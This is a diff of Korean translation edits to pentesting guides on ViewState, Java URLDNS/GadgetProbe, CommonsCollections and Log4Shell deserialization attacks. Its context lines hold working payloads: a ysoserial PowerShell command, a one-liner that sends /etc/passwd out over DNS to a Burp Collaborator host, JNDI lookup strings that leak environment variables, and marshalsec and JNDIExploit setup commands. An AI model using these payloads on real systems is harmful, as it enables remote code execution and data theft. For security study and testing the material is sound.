@@ -106,17 +106,17 @@ ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell.exe Inv
 ```
 ### Test Case: 3 – .Net < 4.5 및 EnableViewStateMac=true/false 및 ViewStateEncryptionMode=true
 
-이 경우 매개변수가 MAC으로 보호되는지 여부는 알려져 있지 않습니다. 따라서 값은 아마도 암호화되어 있으며 **취약점을 악용하기 위해 페이로드를 암호화할 Machine Key가 필요합니다.**
+이 경우 매개변수가 MAC으로 보호되는지 여부는 알려져 있지 않습니다. 따라서 값은 아마도 암호화되어 있으며 **취약점을 악용하기 위해 페이로드를 암호화할 Machine Key가 필요합니다**.
 
 **이 경우** [**Blacklist3r**](https://github.com/NotSoSecure/Blacklist3r/tree/master/MachineKey/AspDotNetWrapper) **모듈이 개발 중입니다...**
 
-**.NET 4.5 이전에**, ASP.NET은 **`ViewStateEncryptionMode`**가 _**항상**_으로 설정되어 있더라도 사용자로부터 **암호화되지 않은** \_`__VIEWSTATE`\_ 매개변수를 **수용할 수 있습니다**. ASP.NET은 **요청에서** **`__VIEWSTATEENCRYPTED`** 매개변수의 **존재**만 **확인합니다**. **이 매개변수를 제거하고 암호화되지 않은 페이로드를 전송하면 여전히 처리됩니다.**
+**.NET 4.5 이전에**, ASP.NET은 **`ViewStateEncryptionMode`**가 _**항상**_으로 설정되어 있더라도 사용자로부터 **암호화되지 않은** \_`__VIEWSTATE`\_ 매개변수를 **받을 수 있습니다**. ASP.NET은 요청에서 **`__VIEWSTATEENCRYPTED`** 매개변수의 **존재**만 **확인합니다**. **이 매개변수를 제거하고 암호화되지 않은 페이로드를 전송하면 여전히 처리됩니다.**
 
 따라서 공격자가 파일 탐색과 같은 다른 취약점을 통해 Machinekey를 얻는 방법을 찾으면, **Case 2**에서 사용된 [**YSoSerial.Net**](https://github.com/pwntester/ysoserial.net) 명령을 사용하여 ViewState 역직렬화 취약점을 이용한 RCE를 수행할 수 있습니다.
 
 - ViewState 역직렬화 취약점을 악용하기 위해 요청에서 `__VIEWSTATEENCRYPTED` 매개변수를 제거하십시오. 그렇지 않으면 Viewstate MAC 검증 오류가 반환되고 악용이 실패합니다.
 
-### Test Case: 4 – .Net >= 4.5 및 EnableViewStateMac=true/false 및 ViewStateEncryptionMode=true/false 단, 두 속성이 모두 false인 경우
+### Test Case: 4 – .Net >= 4.5 및 EnableViewStateMac=true/false 및 ViewStateEncryptionMode=true/false 두 속성이 모두 false인 경우
 
 아래와 같이 web.config 파일 내에 아래 매개변수를 지정하여 ASP.NET 프레임워크의 사용을 강제할 수 있습니다.
 ```xml
@@ -153,16 +153,16 @@ ysoserial.exe -p ViewState  -g TextFormattingRunProperties -c "powershell.exe In
 
 ![](https://notsosecure.com/sites/all/assets/group/nss_uploads/2019/06/4.2.png)
 
-ViewState 역직렬화 취약점을 성공적으로 악용하면 공격자가 제어하는 서버로의 아웃 오브 밴드 요청이 발생하며, 여기에는 사용자 이름이 포함됩니다. 이러한 종류의 익스플로잇은 "Exploiting ViewState Deserialization using Blacklist3r and YsoSerial.NET"이라는 제목의 리소스를 통해 찾을 수 있는 개념 증명(PoC)에서 시연됩니다. 익스플로잇 과정이 어떻게 작동하는지와 MachineKey를 식별하기 위해 Blacklist3r와 같은 도구를 활용하는 방법에 대한 자세한 내용은 제공된 [PoC of Successful Exploitation](https://www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/#PoC)을 검토할 수 있습니다.
+ViewState 역직렬화 취약점을 성공적으로 악용하면 공격자가 제어하는 서버로 사용자 이름을 포함한 비동기 요청이 전송됩니다. 이러한 종류의 익스플로잇은 "Exploiting ViewState Deserialization using Blacklist3r and YsoSerial.NET"이라는 제목의 리소스를 통해 찾을 수 있는 개념 증명(PoC)에서 시연됩니다. 익스플로잇 과정이 어떻게 작동하는지와 MachineKey를 식별하기 위해 Blacklist3r와 같은 도구를 활용하는 방법에 대한 자세한 내용은 제공된 [PoC of Successful Exploitation](https://www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/#PoC)을 검토할 수 있습니다.
 
 ### Test Case 6 – ViewStateUserKeys가 사용되고 있음
 
-**ViewStateUserKey** 속성은 **CSRF 공격**에 대해 **방어**하는 데 사용할 수 있습니다. 애플리케이션에서 이러한 키가 정의되어 있고 지금까지 논의된 방법으로 **ViewState** 페이로드를 생성하려고 하면, **페이로드는 애플리케이션에 의해 처리되지 않습니다**.\
+**ViewStateUserKey** 속성은 **CSRF 공격**에 대해 **방어**하는 데 사용할 수 있습니다. 애플리케이션에 그러한 키가 정의되어 있고 지금까지 논의된 방법으로 **ViewState** 페이로드를 생성하려고 하면, **페이로드는 애플리케이션에 의해 처리되지 않습니다**.\
 페이로드를 올바르게 생성하기 위해 추가 매개변수를 하나 더 사용해야 합니다:
 ```bash
 --viewstateuserkey="randomstringdefinedintheserver"
 ```
-### 성공적인 취약점 이용의 결과 <a href="#poc" id="poc"></a>
+### 성공적인 취약점 이용 결과 <a href="#poc" id="poc"></a>
 
 모든 테스트 케이스에서 ViewState YSoSerial.Net 페이로드가 **성공적으로** 작동하면 서버는 “**500 Internal server error**”와 함께 응답 내용 “**이 페이지에 대한 상태 정보가 유효하지 않거나 손상되었을 수 있습니다**”를 반환하며 OOB 요청을 받습니다.
 
diff --git a/src/pentesting-web/deserialization/java-dns-deserialization-and-gadgetprobe.md b/src/pentesting-web/deserialization/java-dns-deserialization-and-gadgetprobe.md
index 32477e02b..222bf5d31 100644
--- a/src/pentesting-web/deserialization/java-dns-deserialization-and-gadgetprobe.md
+++ b/src/pentesting-web/deserialization/java-dns-deserialization-and-gadgetprobe.md
@@ -8,10 +8,10 @@
 ```java
 public final class URL implements java.io.Serializable {
 ```
-이 클래스는 **호기심 많은 동작**을 가지고 있습니다. 문서에서: “**두 호스트는 두 호스트 이름이 동일한 IP 주소로 해석될 수 있는 경우 동등한 것으로 간주됩니다**.”\
-그런 다음, URL 객체가 **`equals`** 또는 **`hashCode`**의 **어떤** 함수를 호출할 때마다 **IP 주소**를 얻기 위한 **DNS 요청**이 **전송**됩니다.
+이 클래스는 **호기심 많은 동작**을 가지고 있습니다. 문서에서: “**두 호스트는 두 호스트 이름이 동일한 IP 주소로 확인될 수 있는 경우 동등한 것으로 간주됩니다**.”\
+따라서, URL 객체가 **`equals`** 또는 **`hashCode`**의 **어떤** 함수를 호출할 때마다 **IP 주소**를 얻기 위한 **DNS 요청**이 **전송**됩니다.
 
-**URL** 객체에서 **`hashCode`** 함수를 **호출하는** 것은 상당히 쉽습니다. 이 객체를 역직렬화될 `HashMap`에 삽입하기만 하면 됩니다. 이는 `HashMap`의 **`readObject`** 함수의 **끝**에서 이 코드가 실행되기 때문입니다:
+**URL** 객체에서 **`hashCode`** 함수를 **호출하는** 것은 상당히 쉽습니다. 이 객체를 **역직렬화**될 `HashMap`에 삽입하기만 하면 됩니다. 이는 `HashMap`의 **`readObject`** 함수의 **끝**에서 이 코드가 실행되기 때문입니다:
 ```java
 private void readObject(java.io.ObjectInputStream s)
 throws IOException, ClassNotFoundException {
@@ -21,14 +21,14 @@ for (int i = 0; i < mappings; i++) {
 putVal(hash(key), key, value, false, false);
 }
 ```
-모든 값에 대해 `HashMap` 내부의 `putVal`을 **실행**할 **것입니다**. 그러나 더 중요한 것은 모든 값에 대한 `hash` 호출입니다. 이것은 `hash` 함수의 코드입니다:
+모든 값에 대해 `HashMap` 내부의 `putVal`을 **실행**할 **것입니다**. 그러나 더 중요한 것은 모든 값에 대해 `hash`를 호출하는 것입니다. 이것은 `hash` 함수의 코드입니다:
 ```java
 static final int hash(Object key) {
 int h;
 return (key == null) ? 0 : (h = key.hashCode()) ^ (h >>> 16);
 }
 ```
-관찰할 수 있듯이, **역직렬화할 때** **`HashMap`**의 함수 `hash`는 **모든 객체와 함께 실행**되며 **`hash`** 실행 중에 **객체의 `.hashCode()`가 실행**됩니다. 따라서 **URL** 객체를 포함하는 **`HashMap`**을 **역직렬화**하면 **URL 객체**가 **`.hashCode()`를 실행**합니다.
+관찰할 수 있듯이, **역직렬화할 때** **`HashMap`**의 함수 `hash`는 **모든 객체에 대해 실행됩니다** 그리고 **`hash`** 실행 중에 **객체의 `.hashCode()`가 실행됩니다**. 따라서 **URL** 객체를 포함하는 **`HashMap`**을 **역직렬화**하면, **URL 객체**는 **`.hashCode()`를 실행합니다**.
 
 이제 `URLObject.hashCode()`의 코드를 살펴보겠습니다:
 ```java
@@ -53,9 +53,9 @@ h += protocol.hashCode();
 InetAddress addr = getHostAddress(u);
 [   ...   ]
 ```
-`getHostAddress`가 도메인에 대해 실행되어 **DNS 쿼리**가 시작되는 것을 볼 수 있습니다.
+`getHostAddress`가 도메인에 대해 실행되어 **DNS 쿼리**가 **시작**되는 것을 볼 수 있습니다.
 
-따라서 이 클래스는 **역직렬화**가 가능하다는 것을 **증명하기 위해** 또는 **정보를 유출하기 위해** **DNS 쿼리**를 **실행하기 위해** **악용**될 수 있습니다(명령 실행의 출력을 서브도메인으로 추가할 수 있습니다).
+따라서 이 클래스는 **역직렬화**가 가능하다는 것을 **증명**하기 위해 **DNS 쿼리**를 **시작**하거나, 심지어 **정보를 유출**하기 위해 **악용**될 수 있습니다(명령 실행의 출력을 서브도메인으로 추가할 수 있습니다).
 
 ### URLDNS 페이로드 코드 예제
 
@@ -135,7 +135,7 @@ return null;
 
 ### 작동 방식
 
-**GadgetProbe**는 이전 섹션의 **DNS 페이로드**를 사용하지만 **DNS 쿼리를 실행하기 전에** **임의의 클래스를 역직렬화하려고** 시도합니다. **임의의 클래스가 존재하면**, **DNS 쿼리**가 **전송**되고 GadgetProbe는 이 클래스가 존재함을 기록합니다. **DNS** 요청이 **결코 전송되지 않으면**, 이는 **임의의 클래스가 성공적으로 역직렬화되지 않았음을** 의미하므로, 클래스가 존재하지 않거나 **직렬화할 수 없거나/악용할 수 없음을** 나타냅니다.
+**GadgetProbe**는 이전 섹션의 **DNS 페이로드**를 사용하지만 **DNS 쿼리를 실행하기 전에** **임의의 클래스를 역직렬화**하려고 시도합니다. **임의의 클래스가 존재하면**, **DNS 쿼리**가 **전송**되고 GadgetProbe는 이 클래스가 존재함을 기록합니다. **DNS** 요청이 **결코 전송되지 않으면**, 이는 **임의의 클래스가 성공적으로 역직렬화되지 않았음을** 의미하므로, 클래스가 존재하지 않거나 **직렬화할 수 없거나/악용할 수 없음을** 나타냅니다.
 
 GitHub 내에서, [**GadgetProbe에는 테스트할 Java 클래스가 포함된 단어 목록이 있습니다**](https://github.com/BishopFox/GadgetProbe/tree/master/wordlists).
 
@@ -148,11 +148,11 @@ GitHub 내에서, [**GadgetProbe에는 테스트할 Java 클래스가 포함된
 ## Java 역직렬화 스캐너
 
 이 스캐너는 Burp App Store (**Extender**)에서 **다운로드**할 수 있습니다.\
-**확장**은 **수동** 및 **능동적** **기능**을 가지고 있습니다.
+**확장**은 **수동** 및 **능동** **기능**을 가지고 있습니다.
 
 ### 수동
 
-기본적으로 모든 요청과 응답을 **수동적으로 확인**하여 **Java 직렬화 마법 바이트**를 찾고, 발견된 경우 취약성 경고를 표시합니다:
+기본적으로 모든 요청과 응답을 **수동으로 확인**하여 **Java 직렬화 마법 바이트**를 찾고, 발견된 경우 취약성 경고를 표시합니다:
 
 ![https://techblog.mediaservice.net/2017/05/reliable-discovery-and-exploitation-of-java-deserialization-vulnerabilities/](<../../images/image (765).png>)
 
@@ -170,13 +170,13 @@ GitHub 내에서, [**GadgetProbe에는 테스트할 Java 클래스가 포함된
 **악용**
 
 취약한 라이브러리를 식별한 후, 요청을 _Exploiting Tab_으로 보낼 수 있습니다.\
-이 탭에서 **주입 지점**을 다시 **선택**하고, 페이로드를 생성할 **취약한 라이브러리**와 **명령**을 **작성**해야 합니다. 그런 다음, 적절한 **공격** 버튼을 누르십시오.
+이 탭에서 **주입 지점**을 다시 **선택**하고, 페이로드를 생성할 **취약한 라이브러리**와 **명령어**를 **작성**해야 합니다. 그런 다음, 적절한 **공격** 버튼을 누릅니다.
 
 ![https://techblog.mediaservice.net/2017/05/reliable-discovery-and-exploitation-of-java-deserialization-vulnerabilities/](../../images/4.png)
 
 ### Java 역직렬화 DNS 유출 정보
 
-페이로드가 다음과 같은 작업을 수행하도록 만드십시오:
+페이로드가 다음과 같은 작업을 수행하도록 만드세요:
 ```bash
 (i=0;tar zcf - /etc/passwd | xxd -p -c 31 | while read line; do host $line.$i.cl1k22spvdzcxdenxt5onx5id9je73.burpcollaborator.net;i=$((i+1)); done)
 ```
diff --git a/src/pentesting-web/deserialization/java-transformers-to-rutime-exec-payload.md b/src/pentesting-web/deserialization/java-transformers-to-rutime-exec-payload.md
index ace85c279..6c190df29 100644
--- a/src/pentesting-web/deserialization/java-transformers-to-rutime-exec-payload.md
+++ b/src/pentesting-web/deserialization/java-transformers-to-rutime-exec-payload.md
@@ -45,7 +45,7 @@ lazyMap.get("anything");
 Java deserialization payloads에 대해 아무것도 모른다면 이 코드가 calc를 실행하는 이유를 파악하기 어려울 수 있습니다.
 
 우선, **Java의 Transformer**는 **클래스를 수신**하고 **다른 클래스로 변환**하는 것입니다.\
-또한 여기서 **실행되는 payload**는 **다음과 동등**하다는 것을 아는 것이 흥미롭습니다:
+또한 여기서 **실행되는 payload**는 **다음과 동등하다는 것을 아는 것이 흥미롭습니다:**
 ```java
 Runtime.getRuntime().exec(new String[]{"calc.exe"});
 ```
@@ -55,7 +55,7 @@ Runtime.getRuntime().exec(new String[]{"calc.exe"});
 ```
 ### 방법
 
-그래서, 첫 번째 페이로드가 그 "간단한" 원라이너와 어떻게 동등한가요?
+그래서 첫 번째 페이로드가 그 "간단한" 한 줄짜리와 어떻게 동등한가요?
 
 **첫째**로, 페이로드에서 **변환의 체인(배열)이 생성된다는 것을 알 수 있습니다**:
 ```java
@@ -124,7 +124,7 @@ object = iTransformers[i].transform(object);
 return object;
 }
 ```
-그래서 **factory** 안에 **`chainedTransformer`**를 저장했으며, **`transform`** 함수 안에서 **모든 체인된 변환기를 순회하며** 하나씩 실행하고 있다는 것을 기억하세요. 재미있는 점은 **각 변환기가 `object`**를 **입력으로 사용하고** **object는 마지막으로 실행된 변환기의 출력**이라는 것입니다. 따라서 **모든 변환이 악의적인 페이로드를 체인으로 실행하고 있습니다**.
+그래서 **factory** 안에 **`chainedTransformer`**를 저장했으며, **`transform`** 함수 안에서 **모든 체인된 변환기를 순차적으로 실행하고** 있습니다. 재미있는 점은 **각 변환기가 `object`를 입력으로 사용하고** **object가 마지막으로 실행된 변환기의 출력**이라는 것입니다. 따라서 **모든 변환이 악의적인 페이로드를 체인으로 실행하고** 있습니다.
 
 ### 요약
 
@@ -149,11 +149,11 @@ new Class[]{String.class},
 command
 ).transform(value); //(4)
 ```
-_각 변환의 입력이 `value`이고 이전 변환의 출력임을 주목하세요. 이는 한 줄짜리 실행을 가능하게 합니다:_
+_각 변환의 입력이 `value`이고 이전 변환의 출력임을 주목하세요. 이는 한 줄 코드를 실행할 수 있게 합니다:_
 ```java
 ((Runtime) (Runtime.class.getMethod("getRuntime").invoke(null))).exec(new String[]{"calc.exe"});
 ```
-여기서 **ComonsCollections1** 페이로드에 사용된 **가젯**이 설명되었습니다. 그러나 **이 모든 것이 어떻게 실행되는지**는 남겨져 있습니다. [여기에서 **ysoserial**](https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/CommonsCollections1.java)를 보면, 이 페이로드를 실행하기 위해 `AnnotationInvocationHandler` 객체를 사용합니다. **이 객체가 역직렬화되면**, `payload.get()` 함수를 **호출**하여 **전체 페이로드를 실행**합니다.
+여기에서 **ComonsCollections1** 페이로드에 사용된 **가젯**이 설명되었습니다. 그러나 **이 모든 것이 어떻게 실행되는지**는 남겨져 있습니다. [여기에서 **ysoserial**](https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/CommonsCollections1.java)를 보면, 이 페이로드를 실행하기 위해 `AnnotationInvocationHandler` 객체를 사용합니다. **이 객체가 역직렬화되면**, `payload.get()` 함수를 **호출**하여 **전체 페이로드를 실행**합니다.
 
 ## Java Thread Sleep
 
diff --git a/src/pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.md b/src/pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.md
index c3d32e4cc..9999921a3 100644
--- a/src/pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.md
+++ b/src/pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.md
@@ -4,7 +4,7 @@
 
 ## 기본 정보
 
-JNDI는 1990년대 후반부터 Java에 통합되어 데이터나 객체를 이름 체계를 통해 찾을 수 있도록 하는 디렉토리 서비스 역할을 합니다. 서비스 제공자 인터페이스(SPIs)를 통해 다양한 디렉토리 서비스를 지원하며, 원격 Java 객체를 포함한 다양한 시스템에서 데이터 검색이 가능합니다. 일반적인 SPIs로는 CORBA COS, Java RMI Registry, LDAP이 있습니다.
+JNDI는 1990년대 후반부터 Java에 통합되어 데이터나 객체를 이름 체계를 통해 찾을 수 있도록 하는 디렉토리 서비스 역할을 합니다. 서비스 제공자 인터페이스(SPIs)를 통해 다양한 디렉토리 서비스를 지원하며, 원격 Java 객체를 포함한 다양한 시스템에서 데이터 검색이 가능합니다. 일반적인 SPI로는 CORBA COS, Java RMI Registry, LDAP이 있습니다.
 
 ### JNDI 이름 참조
 
@@ -15,11 +15,11 @@ Java 객체는 JNDI 이름 참조를 사용하여 저장하고 검색할 수 있
 
 그러나 이 메커니즘은 악용될 수 있으며, 임의의 코드가 로드되고 실행될 수 있습니다. 이에 대한 대응책으로:
 
-- **RMI**: JDK 7u21부터 기본적으로 `java.rmi.server.useCodebaseOnly = true`로 설정되어 원격 객체 로드를 제한합니다. 보안 관리자가 추가로 로드할 수 있는 항목을 제한합니다.
+- **RMI**: JDK 7u21부터 기본적으로 `java.rmi.server.useCodebaseOnly = true`로 설정되어 원격 객체 로드를 제한합니다. 보안 관리자가 추가로 로드할 수 있는 내용을 제한합니다.
 - **LDAP**: JDK 6u141, 7u131, 8u121부터 기본적으로 `com.sun.jndi.ldap.object.trustURLCodebase = false`로 설정되어 원격으로 로드된 Java 객체의 실행을 차단합니다. `true`로 설정하면 보안 관리자의 감독 없이 원격 코드 실행이 가능합니다.
 - **CORBA**: 특정 속성이 없지만 보안 관리자는 항상 활성화되어 있습니다.
 
-그러나 JNDI 링크를 해결하는 역할을 하는 **이름 관리자**는 내장된 보안 메커니즘이 부족하여 모든 출처에서 객체를 검색할 수 있는 위험이 있습니다. 이는 RMI, LDAP 및 CORBA 보호를 우회할 수 있어 임의의 Java 객체를 로드하거나 기존 애플리케이션 구성 요소(가젯)를 악용하여 악성 코드를 실행할 수 있습니다.
+그러나 JNDI 링크를 해결하는 역할을 하는 **이름 관리자**는 내장 보안 메커니즘이 부족하여 모든 출처에서 객체를 검색할 수 있는 위험이 있습니다. 이는 RMI, LDAP 및 CORBA 보호를 우회할 수 있어 임의의 Java 객체를 로드하거나 기존 애플리케이션 구성 요소(가젯)를 악용하여 악성 코드를 실행할 수 있습니다.
 
 악용 가능한 URL의 예는 다음과 같습니다:
 
@@ -33,7 +33,7 @@ Java 객체는 JNDI 이름 참조를 사용하여 저장하고 검색할 수 있
 
 ![](<../../images/image (1022).png>)
 
-**`PROVIDER_URL`**을 설정했더라도 조회에서 다른 URL을 지정할 수 있으며, 이는 접근됩니다: `ctx.lookup("<attacker-controlled-url>")`와 같이 공격자가 이를 악용하여 그가 제어하는 시스템에서 임의의 객체를 로드할 수 있습니다.
+**`PROVIDER_URL`**을 설정했더라도, 조회 시 다른 URL을 지정할 수 있으며 접근할 수 있습니다: `ctx.lookup("<attacker-controlled-url>")` 이는 공격자가 자신이 제어하는 시스템에서 임의의 객체를 로드하는 데 악용할 것입니다.
 
 ### CORBA 개요
 
@@ -72,7 +72,7 @@ LDAP 검색이 **SearchControls.setReturningObjFlag()**와 함께 `true`로 호
 
 ![](<../../images/image (275).png>)
 
-**익스플로잇은 직렬화되어 있으며** 역직렬화됩니다.\
+**익스플로잇은 직렬화되어** 역직렬화됩니다.\
 `trustURLCodebase`가 `true`인 경우, 공격자는 코드베이스에 자신의 클래스를 제공할 수 있으며, 그렇지 않으면 클래스 경로에서 가젯을 악용해야 합니다.
 
 #### JNDI 참조 익스플로잇
@@ -85,7 +85,7 @@ LDAP 검색이 **SearchControls.setReturningObjFlag()**와 함께 `true`로 호
 
 이 취약점은 Log4j에서 [**특수 구문**](https://logging.apache.org/log4j/2.x/manual/configuration.html#PropertySubstitution)을 지원하기 때문에 발생합니다. 이 구문은 `${prefix:name}` 형식이며, 여기서 `prefix`는 여러 다른 [**조회**](https://logging.apache.org/log4j/2.x/manual/lookups.html) 중 하나이고 `name`은 평가되어야 합니다. 예를 들어, `${java:version}`은 현재 실행 중인 Java 버전입니다.
 
-[**LOG4J2-313**](https://issues.apache.org/jira/browse/LOG4J2-313)은 `jndi` 조회 기능을 도입했습니다. 이 기능은 JNDI를 통해 변수를 검색할 수 있게 해줍니다. 일반적으로 키는 자동으로 `java:comp/env/`로 접두사가 붙습니다. 그러나 키 자체에 **":"**가 포함된 경우, 이 기본 접두사는 적용되지 않습니다.
+[**LOG4J2-313**](https://issues.apache.org/jira/browse/LOG4J2-313)은 `jndi` 조회 기능을 도입했습니다. 이 기능은 JNDI를 통해 변수를 검색할 수 있게 해줍니다. 일반적으로 키는 자동으로 `java:comp/env/`로 접두사가 붙습니다. 그러나 키 자체에 **":"**가 포함된 경우, 이 기본 접두사가 적용되지 않습니다.
 
 키에 **:가 존재**하는 경우, 예를 들어 `${jndi:ldap://example.com/a}`와 같이 **접두사가 없고** **LDAP 서버에 객체가 쿼리됩니다**. 이러한 조회는 Log4j의 구성뿐만 아니라 로그가 기록될 때에도 사용될 수 있습니다.
 
@@ -95,7 +95,7 @@ LDAP 검색이 **SearchControls.setReturningObjFlag()**와 함께 `true`로 호
 
 ### [CVE-2021-44228](https://nvd.nist.gov/vuln/detail/CVE-2021-44228) **\[Critical]**
 
-이 취약점은 `log4j-core` 구성 요소의 심각한 **신뢰할 수 없는 역직렬화 결함**으로, 2.0-beta9에서 2.14.1까지의 버전에 영향을 미칩니다. 이는 **원격 코드 실행(RCE)**을 허용하여 공격자가 시스템을 장악할 수 있게 합니다. 이 문제는 Alibaba Cloud Security Team의 Chen Zhaojun에 의해 보고되었으며, 다양한 Apache 프레임워크에 영향을 미칩니다. 2.15.0 버전의 초기 수정은 불완전했습니다. 방어를 위한 Sigma 규칙이 제공됩니다 ([규칙 1](https://github.com/SigmaHQ/sigma/blob/master/rules/web/web_cve_2021_44228_log4j_fields.yml), [규칙 2](https://github.com/SigmaHQ/sigma/blob/master/rules/web/web_cve_2021_44228_log4j.yml)).
+이 취약점은 `log4j-core` 구성 요소의 심각한 **신뢰할 수 없는 역직렬화 결함**으로, 2.0-beta9에서 2.14.1까지의 버전에 영향을 미칩니다. 이는 **원격 코드 실행(RCE)**을 허용하여 공격자가 시스템을 장악할 수 있게 합니다. 이 문제는 Alibaba Cloud Security Team의 Chen Zhaojun에 의해 보고되었으며, 다양한 Apache 프레임워크에 영향을 미칩니다. 2.15.0 버전의 초기 수정은 불완전했습니다. 방어를 위한 Sigma 규칙이 제공됩니다 ([Rule 1](https://github.com/SigmaHQ/sigma/blob/master/rules/web/web_cve_2021_44228_log4j_fields.yml), [Rule 2](https://github.com/SigmaHQ/sigma/blob/master/rules/web/web_cve_2021_44228_log4j.yml)).
 
 ### [CVE-2021-45046](https://nvd.nist.gov/vuln/detail/CVE-2021-45046) **\[Critical]**
 
@@ -127,12 +127,12 @@ log4j 버전 2.17에 영향을 미치는 이 CVE는 공격자가 log4j의 구성
 - `${jndi:ldap://c72gqsaum5n94mgp67m0c8no4hoyyyyyn.interact.sh}` (using [interactsh](https://github.com/projectdiscovery/interactsh))
 - `${jndi:ldap://abpb84w6lqp66p0ylo715m5osfy5mu.burpcollaborator.net}` (using Burp Suite)
 - `${jndi:ldap://2j4ayo.dnslog.cn}` (using [dnslog](http://dnslog.cn))
-- `${jndi:ldap://log4shell.huntress.com:1389/hostname=${env:HOSTNAME}/fe47f5ee-efd7-42ee-9897-22d18976c520}` using (using [huntress](https://log4shell.huntress.com))
+- `${jndi:ldap://log4shell.huntress.com:1389/hostname=${env:HOSTNAME}/fe47f5ee-efd7-42ee-9897-22d18976c520}` (using [huntress](https://log4shell.huntress.com))
 
 **DNS 요청이 수신되었다고 해서 애플리케이션이 악용 가능하다는 의미는 아닙니다**(또는 심지어 취약하다는 의미도 아닙니다). 이를 악용하려고 시도해야 합니다.
 
 > [!NOTE]
-> **버전 2.15**를 악용하려면 **localhost 체크 우회**를 추가해야 합니다: ${jndi:ldap://**127.0.0.1#**...}
+> **버전 2.15를 악용하려면** **localhost 체크 우회**를 추가해야 합니다: ${jndi:ldap://**127.0.0.1#**...}
 
 #### **로컬 발견**
 
@@ -209,13 +209,13 @@ Any other env variable name that could store sensitive information
 >
 > 이러한 높은 JDK 버전을 악용하려는 공격자는 Java 애플리케이션 내에서 **신뢰할 수 있는 가젯**을 활용해야 합니다. ysoserial 또는 JNDIExploit과 같은 도구가 종종 이 목적에 사용됩니다. 반면, 낮은 JDK 버전을 악용하는 것은 상대적으로 더 쉽습니다. 이러한 버전은 임의의 클래스를 로드하고 실행하도록 조작할 수 있습니다.
 >
-> **자세한 정보는** (_RMI 및 CORBA 벡터에 대한 제한 사항과 같은_) **이전 JNDI 명명 참조 섹션을 확인하거나** [https://jfrog.com/blog/log4shell-0-day-vulnerability-all-you-need-to-know/](https://jfrog.com/blog/log4shell-0-day-vulnerability-all-you-need-to-know/) **를 참조하세요.**
+> **자세한 정보** (_RMI 및 CORBA 벡터에 대한 제한 사항과 같은_) **는 이전 JNDI 명명 참조 섹션을 확인하거나** [https://jfrog.com/blog/log4shell-0-day-vulnerability-all-you-need-to-know/](https://jfrog.com/blog/log4shell-0-day-vulnerability-all-you-need-to-know/) **를 참조하세요.**
 
 ### RCE - 사용자 정의 페이로드를 사용한 Marshalsec
 
-이것을 **THM 박스에서 테스트할 수 있습니다:** [**https://tryhackme.com/room/solar**](https://tryhackme.com/room/solar)
+이것을 **THM 박스**에서 테스트할 수 있습니다: [**https://tryhackme.com/room/solar**](https://tryhackme.com/room/solar)
 
-도구 [**marshalsec**](https://github.com/mbechler/marshalsec) (jar 버전은 [**여기**](https://github.com/RandomRobbieBF/marshalsec-jar)에서 사용 가능)를 사용하세요. 이 접근 방식은 연결을 두 번째 HTTP 서버로 리디렉션하는 LDAP 추천 서버를 설정하여 익스플로잇이 호스팅될 수 있도록 합니다:
+도구 [**marshalsec**](https://github.com/mbechler/marshalsec) (jar 버전은 [**여기**](https://github.com/RandomRobbieBF/marshalsec-jar)에서 사용 가능)를 사용하세요. 이 접근 방식은 연결을 두 번째 HTTP 서버로 리디렉션하는 LDAP 참조 서버를 설정하여 익스플로잇이 호스팅될 수 있도록 합니다:
 ```bash
 java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://<your_ip_http_server>:8000/#Exploit"
 ```
@@ -237,12 +237,12 @@ Java 파일을 클래스 파일로 컴파일하려면: `javac Exploit.java -sour
 ```bash
 ${jndi:ldap://<LDAP_IP>:1389/Exploit}
 ```
-**참고:** 이 익스플로잇은 Java의 구성이 LDAP를 통해 원격 코드베이스 로딩을 허용하는 데 의존합니다. 이것이 허용되지 않는 경우, 임의 코드 실행을 위해 신뢰할 수 있는 클래스를 이용하는 것을 고려하십시오.
+**참고:** 이 익스플로잇은 Java의 구성이 LDAP를 통해 원격 코드베이스 로딩을 허용하는 것에 의존합니다. 이것이 허용되지 않는 경우, 임의 코드 실행을 위해 신뢰할 수 있는 클래스를 이용하는 것을 고려하십시오.
 
 ### RCE - **JNDIExploit**
 
 > [!NOTE]
-> 어떤 이유로 저자가 log4shell 발견 후 이 프로젝트를 github에서 제거했습니다. [https://web.archive.org/web/20211210224333/https://github.com/feihong-cs/JNDIExploit/releases/tag/v1.2](https://web.archive.org/web/20211210224333/https://github.com/feihong-cs/JNDIExploit/releases/tag/v1.2)에서 캐시된 버전을 찾을 수 있지만, 저자의 결정을 존중하고 싶다면 이 취약점을 이용하는 다른 방법을 사용하십시오.
+> 어떤 이유로 저자가 log4shell 발견 후 이 프로젝트를 github에서 제거했습니다. [https://web.archive.org/web/20211210224333/https://github.com/feihong-cs/JNDIExploit/releases/tag/v1.2](https://web.archive.org/web/20211210224333/https://github.com/feihong-cs/JNDIExploit/releases/tag/v1.2)에서 캐시된 버전을 찾을 수 있지만, 저자의 결정을 존중하고 싶다면 이 취약점을 이용하기 위해 다른 방법을 사용하십시오.
 >
 > 또한, wayback machine에서 소스 코드를 찾을 수 없으므로, 소스 코드를 분석하거나 실행하는 내용을 모른 채 jar 파일을 실행하십시오.
 
@@ -254,7 +254,7 @@ wget https://web.archive.org/web/20211210224333/https://github.com/feihong-cs/JN
 unzip JNDIExploit.v1.2.zip
 java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 172.17.0.1 -p 8888 # Use your private IP address and a port where the victim will be able to access
 ```
-코드를 몇 분만 읽으면, _com.feihong.ldap.LdapServer_와 _com.feihong.ldap.HTTPServer_에서 **LDAP 및 HTTP 서버가 어떻게 생성되는지** 알 수 있습니다. LDAP 서버는 어떤 페이로드를 제공해야 하는지 이해하고, 피해자를 HTTP 서버로 리디렉션하여 익스플로잇을 제공합니다.\
